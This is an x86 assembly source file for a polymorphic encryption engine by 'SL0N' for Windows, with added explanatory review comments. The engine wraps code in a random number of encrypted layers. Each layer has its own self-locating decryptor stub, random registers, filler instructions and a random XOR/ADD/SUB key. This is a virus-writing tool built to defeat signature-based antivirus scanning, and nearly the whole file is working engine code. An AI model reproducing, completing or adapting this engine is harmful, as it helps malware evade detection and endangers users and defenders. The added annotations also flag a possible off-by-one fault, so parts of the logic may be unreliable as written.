
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; [POLYMORPHIC GENERATOR OF SHIT V. 0.4] ;
; ;
; ######### ######## ######## ;
; ########### ########## ########## ;
; ##### ###### ###### ## ###### ## ;
; ##### ##### ##### ##### ;
; ##### ##### ##### ######## ;
; ########### ##### ###### ######## ;
; ######### ##### ###### ##### ;
; ##### ##### ### ##### ;
; ##### ########### ########### ;
; ##### ##### ### ######### ;
; ;
; FOR MS WINDOWS ;
; ;
; BY SL0N ;
;------------------------------------------------------------------------------;
; MANUAL: ;
; BUFFER FOR ENCRYPTED CODE + DECRYPTORS -> EDI ;
; START OF CODE -> EAX ;
; SIZE OF CODE -> ECX ;
; ;
; CALL MORPH ;
; ;
; SIZE OF ENCRYPTED CODE + DECRYPTORS -> ECX ;
; BUFFER WITH ENCRYPTED CODE + DECRYPTORS -> EDI ;
;------------------------------------------------------------------------------;
; (+) DO NOT USE WIN API ;
; (+) EASY TO USE ;
; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ;
; (+) USE DELTA OFFSET ;
; (+) USE X87 INSTRUCTIONS ;
; (+) IT CREATES VARIABLE DECRYPTOR SIZE ;
; (+) RANDOMLY CHANGE REGISTERS IN INSTRUCTIONS ;
; (+) RANDOM 32 BIT ENCRYPTION ALGORITHM (ADD/SUB/XOR) ;
; (+) RANDOM NUMBER OF DECRYPTORS ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;------------------------------------------------------------------------------;
; morph - engine entry point (TASM/MASM-style syntax: multi-operand push/pop,
; `offset`). Wraps the caller's code in a random number of nested layers by
; calling polym repeatedly; each iteration's plaintext is the layer produced
; by the previous one, so the last layer written is the outermost.
; In:  edi = output buffer, eax = start of code, ecx = size of code
; Out: edi = start of the last (outermost) layer, ecx = its total size
; Clobbers: eax, ebx, edx, flags (esi and ebp are saved and restored)
; Note: layers are laid out back to back in the buffer (edi advances by
; stub+code after every polym call), so the buffer must hold all of them,
; not only the final layer.
;------------------------------------------------------------------------------;
morph:
push esi ebp ; save registers
call delta0 ;
delta0: ; delta offset:
pop ebp ; ebp = runtime address of delta0
sub ebp,offset delta0 ; minus its assembled offset
push eax ; keep the code start across brandom32
decr_number:
mov eax,40 ; layer count; brandom32 is out of view and
call brandom32 ; presumably returns 0..eax-1 (0..39 here; the
test eax,eax ; original comment said 0..30). Zero is rejected,
jz decr_number ; so at least one layer is always produced
mov ebx,eax ; ebx = layers still to emit
pop eax ; restore code start
multi_decr:
mov edx,edi ; edx = buffer for this layer
call polym ; emit stub + encrypted code at edx
mov eax,edx ; next layer encrypts the layer just written
add edi,ecx ; advance past it (ecx = stub + code size)
dec ebx ;
test ebx,ebx ;
jnz multi_decr ; repeat until ebx layers exist
sub edi,ecx ; edi = start of the last layer written
pop ebp esi ; restore registers
ret ;
;------------------------------------------------------------------------------;
;------------------------------------------------------------------------------;
; polym - builds one layer: writes a decryptor stub into the buffer, then
; appends the code encrypted with a random 32-bit key and one of XOR/ADD/SUB.
; The stub is a fixed skeleton (call $+5 / pop reg1 / add reg1,imm /
; mov reg2,reg1 / add reg2,imm / add reg1,4 / op [reg1],imm / cmp reg1,reg2 /
; jb) whose instruction sizes sum to 5+1+6+2+6+6+6+2+6 = 40 bytes, with nine
; random-length garbage runs spliced between the instructions. Registers,
; garbage lengths, key and operation vary per call; the skeleton does not.
; In:  eax = start of code, ecx = size of code, edx = output buffer,
;      ebp = delta offset (set by morph)
; Out: edx = buffer (stub start), ecx = size of stub + code;
;      ebx, esi, edi, ebp restored; eax undefined
; Side effects: writes the delta-relative variables (sz_decr .. len) and
;      patches one opcode byte at crypt_n below - self-modifying code, so the
;      section holding this routine must be writable.
; Helpers not in view: garbage, brandom32, random32 (elsewhere in the file);
;      len_gen and reg_mutate are below.
;------------------------------------------------------------------------------;
polym:
push ebp edi esi ebx ; save registers
mov [ebp+sz_code],ecx ; stash the inputs in the
mov [ebp+begin_code],eax ; delta-relative variables
mov [ebp+buff],edx ;
mov edi,edx ; edi = write cursor into the buffer
;------------------------------------------------------------------------------;
call len_gen ; len[0..8] = garbage lengths, ecx = their sum
mov [ebp+sz_decr],40 ; sz_decr = fixed skeleton (40 bytes)
add [ebp+sz_decr],ecx ; plus all garbage
; (the 40 must match the emitted instruction sizes listed above)
call reg_mutate ; bh = reg1, bl = reg2 (polym reads bh/bl after
; every garbage call, so garbage is expected to
; preserve ebx)
mov ecx,[ebp+len+0] ; garbage run 0 (garbage is out of view;
call garbage ; presumably emits ecx bytes at edi)
mov al,0e8h ; emit: call $+5 (E8 00000000) - pushes the
stosb ; address of the following byte so the stub
xor eax,eax ; can locate itself at any load address
stosd ;
mov ecx,[ebp+len+4] ; garbage run 1
call garbage ;
mov al,58h ; emit: pop reg1 (58h + reg)
add al,bh ;
stosb ;
mov ecx,[ebp+len+8] ; garbage run 2
call garbage ;
; emit: add reg1,imm32 (81 /0, ModRM C0h + reg)
mov al,81h ;
stosb ;
mov al,0c0h ;
add al,bh ;
stosb ;
; imm32 = sz_decr - len[0] - 9: the popped address is buffer+len[0]+5, the
; encrypted code starts at buffer+sz_decr, and the loop below adds 4 to reg1
; before its first access, hence -5 and -4
mov eax,[ebp+sz_decr] ;
sub eax,[ebp+len] ;
sub eax,9 ;
stosd ;
mov ecx,[ebp+len+12] ; garbage run 3
call garbage ;
mov al,8bh ; emit: mov reg2,reg1
stosb ; (8B, ModRM C0h | reg2<<3 | reg1)
; reg2 will be the loop bound
mov al,bl ;
shl al,3 ;
add al,0c0h ;
add al,bh ;
stosb
mov ecx,[ebp+len+16] ; garbage run 4
call garbage ;
mov al,81h ; emit: add reg2,sz_code+1 (81 /0)
stosb ;
mov al,0c0h ;
add al,bl ;
stosb ;
; reg2 = (start-4) + sz_code + 1 = end-3. NOTE(review): with the
; add-then-op-then-jb loop below this appears to process dwords at
; start..end inclusive when sz_code is a multiple of 4, i.e. one dword
; more than the engine loop at `encrypt` transforms - confirm when analysing
mov eax,[ebp+sz_code] ; add reg2,size_code
inc eax
stosd ;
mov ecx,[ebp+len+20] ; garbage run 5
call garbage ;
mov al,81h ; emit: add reg1,4 (81 /0) - loop head,
stosb ; target of the jb emitted at `next`
mov al,0c0h ;
add al,bh ;
stosb ;
;
mov eax,4 ;
stosd ;
mov ecx,[ebp+len+24] ; garbage run 6
call garbage ;
call random32 ; random32 is out of view; presumably a 32-bit value
mov [ebp+key2],eax ; key2 = key for this layer
lea eax,[ebp+next] ; push the address of `next` so each enc_*
push eax ; branch below returns to it with `ret`
; choose the operation the stub applies; the engine loop at `encrypt`
; is patched to apply the inverse
mov eax,3 ; 0 = XOR, 1 = ADD, 2 = SUB
call brandom32 ;
cmp al,1 ;
je enc_add32 ;
cmp al,2 ;
je enc_sub32 ;
enc_xor32:
mov al,81h ; emit: xor dword [reg1],key2
stosb ; (81 /6, ModRM 30h + reg)
mov al,30h ;
add al,bh ;
stosb ;
mov eax,[ebp+key2]
stosd
push edi ; patch the opcode at crypt_n to 33h
lea edi,[ebp+crypt_n] ; (xor r32,r/m32): engine xors, stub xors
mov al,33h ; (self-modifying write into this code)
stosb ;
pop edi ;
ret ; continues at `next` (address pushed above)
enc_add32:
mov al,81h ; emit: add dword [reg1],key2
stosb ; (81 /0, ModRM 00h + reg)
mov al,bh ;
stosb ;
mov eax,[ebp+key2]
stosd
push edi ; patch crypt_n to 2Bh (sub r32,r/m32):
lea edi,[ebp+crypt_n] ; engine subtracts, stub adds
mov al,2bh ;
stosb ;
pop edi ;
ret ; continues at `next`
enc_sub32:
mov al,81h ; emit: sub dword [reg1],key2
stosb ; (81 /5, ModRM 28h + reg)
mov al,028h ;
add al,bh ;
stosb ;
mov eax,[ebp+key2]
stosd
push edi ; patch crypt_n to 03h (add r32,r/m32):
lea edi,[ebp+crypt_n] ; engine adds, stub subtracts
mov al,03h ;
stosb ;
pop edi ;
ret ; continues at `next`
;------------------------------------------------------------------------------;
next:
mov ecx,[ebp+len+28] ; garbage run 7
call garbage ;
mov al,3bh ; emit: cmp reg1,reg2
stosb ; (3B, ModRM C0h | reg1<<3 | reg2)
;
xor eax,eax ;
mov al,bh ;
shl al,3 ;
add al,0c0h ;
add al,bl ;
stosb ;
;------------------------------------------------------------------------------;
mov ax,820fh ; emit: jb rel32 (0F 82) back to `add reg1,4`
stosw ;
xor eax,eax ; rel32 = -(jb 6 + cmp 2 + len[7] + op 6 + len[6]
dec eax ; + add 6) = -20 - len[28] - len[24]
mov ecx,7*4 ;
sub eax,[ebp+len+ecx] ;
mov ecx,6*4 ;
sub eax,[ebp+len+ecx] ;
sub eax,19 ;
stosd ;
mov ecx,[ebp+len+32] ; garbage run 8 (trailing, still counted in sz_decr)
call garbage ;
;------------------------------------------------------------------------------;
; transform the code dword by dword into the buffer right after the stub
; (edi is now at buffer + sz_decr)
mov ecx,[ebp+sz_code] ; ecx = end of code
mov esi,[ebp+begin_code] ; esi = read cursor
add ecx,esi ;
encrypt: ;
lodsd ;
crypt_n: ; opcode byte patched above (33h/2Bh/03h);
xor eax,[ebp+key2] ; ModRM and disp32 are the same for all three
stosd ;
cmp esi,ecx ; signed pointer compare; a size that is not a
jl encrypt ; multiple of 4 reads/writes past the end
mov edx,[ebp+buff] ; outputs: edx = buffer start,
mov ecx,[ebp+sz_code] ; ecx = stub + code size
add ecx,[ebp+sz_decr] ;
pop ebx esi edi ebp ; restore registers
ret ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; GARBAGE LENGTH GENERATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; LENGTH OF ALL GARBAGE -> ECX ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
len_gen: ; fills len[0..8] with one random garbage-run
; length each and returns their sum
; In:  ebp = delta offset; brandom32 (out of view)
;      presumably returns 0..eax-1
; Out: ecx = sum of the nine lengths
; Clobbers: eax, esi, flags
xor ecx,ecx ; ecx = running sum
xor esi,esi ; esi = byte index into len (0,4,..,32)
loop1: ;
mov eax,100 ; one length, presumably 0..99
call brandom32 ; (the original comment said 0..100)
;
mov [ebp+len+esi],eax ; len[esi/4] = length
add ecx,eax ; accumulate
add esi,4 ;
cmp esi,36 ; nine dwords = 36 bytes
jne loop1 ;
ret ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; REGISTER MUTATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; USES REGISTER N1 -> BH (0..7) ;
; USES REGISTER N2 -> BL (0..7) ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
reg_mutate:
; picks the two registers the emitted stub uses.
; Out: bh = reg1 (0..7, never 4 = esp or 5 = ebp)
;      bl = reg2 (0..7, never 4 = esp, never equal to bh;
;      ebp is allowed)
; reg1 is used as a memory base in ModRM mod=00 form, where
; code 4 means "SIB follows" and code 5 means "disp32 only",
; which is why both are excluded; reg2 only appears in
; register-direct form (mov/add/cmp), so ebp is acceptable.
; In:  brandom32 (out of view) presumably returns 0..eax-1
; Clobbers: eax, flags
generate1:
mov eax,8 ; candidate for reg1, presumably 0..7
call brandom32 ;
cmp al,00000100b ; reject esp
je generate1 ;
cmp al,00000101b ; reject ebp
je generate1 ;
mov bh,al ; bh = reg1
;
generate2:
mov eax,8 ; candidate for reg2, presumably 0..7
call brandom32 ;
cmp al,bh ; must differ from reg1
je generate2 ;
cmp al,00000100b ; reject esp
je generate2 ;
mov bl,al ; bl = reg2
;
ret ;
;------------------------------------------------------------------------------;
; Working variables. All are addressed delta-relative ([ebp+name]) and
; written at runtime, so the section they sit in must be writable.
sz_decr dd 0 ; size of the emitted stub: 40 fixed bytes + all garbage
begin_code dd 0 ; start of the code to encrypt (polym input eax)
st_code dd 0 ; not referenced by the visible code
sz_code dd 0 ; size of the code to encrypt (polym input ecx)
buff dd 0 ; output buffer of the current layer (polym input edx)
key2 dd 0 ; 32-bit key of the current layer (from random32)
;------------------------------------------------------------------------------;
len dd 0,0,0,0,0,0,0,0,0 ; nine garbage-run lengths: filled by len_gen,
; consumed by polym in order (len+0 .. len+32)
;------------------------------------------------------------------------------;